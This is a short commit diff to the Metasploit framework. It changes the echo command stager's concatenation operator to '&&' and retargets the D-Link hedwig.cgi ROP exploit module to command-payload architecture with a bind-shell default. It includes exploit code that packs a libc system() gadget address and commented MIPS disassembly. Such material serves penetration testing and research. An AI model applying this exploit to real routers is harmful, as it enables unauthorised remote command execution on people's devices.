echo stager, arch_cmd

lib/rex/exploitation/cmdstager/echo.rb

@@ -156,7 +156,8 @@ class CmdStagerEcho < CmdStagerBase
   end
 
   def cmd_concat_operator
-    " ; "
+    #" ; "
+    " && "
   end
 
 end

modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb

@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => ['linux'],
-      'Arch'           => ARCH_MIPSLE,
+      'Arch'           => ARCH_CMD,
       'DefaultOptions' => { 'PAYLOAD' => 'generic/shell_bind_tcp' },
       'References'     =>
         [
@@ -90,9 +90,9 @@ class Metasploit3 < Msf::Exploit::Remote
         # .text:000159CC 10 00 B5 27    addiu   $s5, $sp, 0x170+var_160  # get the address of our command into $s5
         # .text:000159D0 21 28 60 02    move    $a1, $s3                 # not used
         # .text:000159D4 21 30 20 02    move    $a2, $s1                 # not used
-        # .text:000159D8 21 C8 00 02    move    $t9, $s0	         # $s0 - system
-        # .text:000159DC 09 F8 20 03    jalr    $t9	                 # call system
-        # .text:000159E0 21 20 A0 02    move    $a0, $s5	         # our cmd -> into a0 as parameter for system
+        # .text:000159D8 21 C8 00 02    move    $t9, $s0                 # $s0 - system
+        # .text:000159DC 09 F8 20 03    jalr    $t9                      # call system
+        # .text:000159E0 21 20 A0 02    move    $a0, $s5                 # our cmd -> into a0 as parameter for system
 
     shellcode << rand_text_alpha_upper(12)                               # unused registers $s6 - $fp
     shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V")   # $ra - gadget nr 1 (prepare the parameter for system)